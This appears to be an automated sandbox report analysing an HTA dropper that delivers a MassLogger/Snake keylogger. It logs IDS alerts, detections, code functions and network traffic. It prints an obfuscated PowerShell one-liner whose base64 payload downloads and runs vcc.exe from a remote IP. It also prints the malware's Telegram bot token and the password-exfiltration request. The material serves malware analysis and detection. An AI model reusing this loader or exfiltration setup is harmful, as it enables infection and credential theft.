                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1956, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline", ProcessId: 5200, ProcessName: csc.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-10T21:36:33.610553+010020220501A Network Trojan was detected192.227.228.2280192.168.2.1149704TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-10T21:36:33.697236+010020220511A Network Trojan was detected192.227.228.2280192.168.2.1149704TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-10T21:36:57.772821+010020577441Malware Command and Control Activity Detected192.168.2.1149712149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-10T21:36:33.605623+010020197142Potentially Bad Traffic192.168.2.1149704192.227.228.2280TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-10T21:36:45.378987+010028032742Potentially Bad Traffic192.168.2.1149705158.101.44.24280TCP
                  2025-03-10T21:36:55.207090+010028032742Potentially Bad Traffic192.168.2.1149705158.101.44.24280TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-10T21:36:57.196560+010018100081Potentially Bad Traffic192.168.2.1149712149.154.167.220443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Roaming\vcc.exeAvira: detection malicious, Label: HEUR/AGEN.1326043
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcc[1].exeAvira: detection malicious, Label: HEUR/AGEN.1326043
                  Source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU", "Telegram Chatid": "403948698"}
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcc[1].exeReversingLabs: Detection: 50%
                  Source: C:\Users\user\AppData\Roaming\vcc.exeReversingLabs: Detection: 50%
                  Source: niceworkingskilldevelopedwithgreatnews.htaVirustotal: Detection: 34%Perma Link
                  Source: niceworkingskilldevelopedwithgreatnews.htaReversingLabs: Detection: 23%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org

                  Compliance

                  barindex
                  Source: C:\Users\user\Links\daphpvwO.pifUnpacked PE file: 11.2.daphpvwO.pif.400000.0.unpack
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.11:49706 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49712 version: TLS 1.2
                  Source: Binary string: easinvoker.pdb source: vcc.exe, 00000006.00000002.1498618356.0000000020599000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000003.1461293441.000000007F320000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1498618356.0000000020570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: daphpvwO.pif, 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: q7C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.pdb source: powershell.exe, 00000003.00000002.1492553926.00000000050D3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: vcc.exe, 00000006.00000003.1461924520.0000000000749000.00000004.00000020.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1498618356.0000000020599000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000003.1461924520.0000000000778000.00000004.00000020.00020000.00000000.sdmp, vcc.exe, 00000006.00000003.1461293441.000000007F320000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1498618356.0000000020570000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_028852F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,6_2_028852F8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h11_2_28F9DE70
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C03490Fh11_2_2C0344F0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C0341B9h11_2_2C033F08
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C03F059h11_2_2C03EDB0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C03F909h11_2_2C03F660
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C03490Fh11_2_2C03483C
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C03EC01h11_2_2C03E958
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C03F4B1h11_2_2C03F208
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C03FD61h11_2_2C03FAB8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBC028h11_2_2CBBBD80
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB037Dh11_2_2CBB0040
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBB778h11_2_2CBBB4D0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBAEC8h11_2_2CBBAC20
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBD718h11_2_2CBBD470
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB9060h11_2_2CBB8DB8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBE878h11_2_2CBBE5D0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBDFC8h11_2_2CBBDD20
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBF128h11_2_2CBBEE80
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB2190h11_2_2CBB1EE8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB18E0h11_2_2CBB1638
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB0EC2h11_2_2CBB0E18
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB0EC2h11_2_2CBB0E10
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB9910h11_2_2CBB9668
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB2A40h11_2_2CBB2798
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBAA70h11_2_2CBBA7C8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBA1C0h11_2_2CBB9F18
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBCA10h11_2_2CBBC768
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBDB70h11_2_2CBBD8C8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBD2C0h11_2_2CBBD018
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBB320h11_2_2CBBB078
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBC482h11_2_2CBBC1D8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBBBD0h11_2_2CBBB928
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBE420h11_2_2CBBE178
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB8C08h11_2_2CBB8960
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB1D38h11_2_2CBB1A90
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB9D68h11_2_2CBB9AC0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBECD0h11_2_2CBBEA28
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB94B8h11_2_2CBB9210
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB2E98h11_2_2CBB2BF0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBCE68h11_2_2CBBCBC0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBBA618h11_2_2CBBA370
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CBB25E8h11_2_2CBB2340
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CC40D0Dh11_2_2CC40B30
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2CC41697h11_2_2CC40B30
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then push 00000000h11_2_2CC44040
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov ecx, dword ptr [ebp-40h]11_2_2CC4F7B0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]11_2_2CC4E6C1
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]11_2_2CC4E6C8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_2CC40040
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov ecx, dword ptr [ebp-40h]11_2_2CC4F7A8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov ecx, 000003E8h11_2_2D5F0448
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then push 00000000h11_2_2D5FC6B8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then lea esp, dword ptr [ebp-08h]11_2_2D5FC6B8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then push 00000000h11_2_2D5FD20F

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 192.227.228.22:80 -> 192.168.2.11:49704
                  Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 192.227.228.22:80 -> 192.168.2.11:49704
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49712 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.11:49712 -> 149.154.167.220:443
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 20:36:33 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 10 Mar 2025 09:07:37 GMTETag: "18c800-62ff94db03eaf"Accept-Ranges: bytesContent-Length: 1624064Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d4 05 00 00 f0 12 00 00 00 00 00 b8 e7 05 00 00 10 00 00 00 f0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 19 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 13 00 a8 25 00 00 00 30 14 00 00 20 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 13 00 20 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 13 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 77 13 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c8 cb 05 00 00 10 00 00 00 cc 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 00 08 00 00 00 e0 05 00 00 08 00 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 3c 3f 0d 00 00 f0 05 00 00 40 0d 00 00 d8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 d8 36 00 00 00 30 13 00 00 00 00 00 00 18 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 a8 25 00 00 00 70 13 00 00 26 00 00 00 18 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 a0 13 00 00 00 00 00 00 3e 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 b0 13 00 00 02 00 00 00 3e 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 67 00 00 00 c0 13 00 00 68 00 00 00 40 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 20 05 00 00 30 14 00 00 20 05 00 00 a8 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 50 19 00 00 00 00 00 00 c8 18
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU/sendDocument?chat_id=403948698&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd5ff1c48b73daHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                  Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                  Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.11:49704 -> 192.227.228.22:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49705 -> 158.101.44.242:80
                  Source: global trafficHTTP traffic detected: GET /840/vcc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.227.228.22Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.11:49706 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_02FA7A38 URLDownloadToFileW,3_2_02FA7A38
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /840/vcc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.227.228.22Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU/sendDocument?chat_id=403948698&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd5ff1c48b73daHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                  Source: powershell.exe, 00000003.00000002.1492553926.00000000050D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.227.228.22/840/vcc.ex
                  Source: powershell.exe, 00000003.00000002.1492553926.00000000050D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.227.228.22/840/vcc.exe
                  Source: powershell.exe, 00000003.00000002.1476213571.00000000031CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.227.228.22/840/vcc.exe1
                  Source: powershell.exe, 00000003.00000002.1476213571.00000000031CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.227.228.22/840/vcc.exeA
                  Source: powershell.exe, 00000003.00000002.1522620204.000000000845F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.227.228.22/840/vcc.exePPC:
                  Source: daphpvwO.pif, 0000000B.00000002.3829347045.00000000293B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: daphpvwO.pif, 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: powershell.exe, 00000003.00000002.1522620204.0000000008427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                  Source: powershell.exe, 00000003.00000002.1506307508.0000000005D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000003.00000002.1492553926.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829347045.00000000293B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
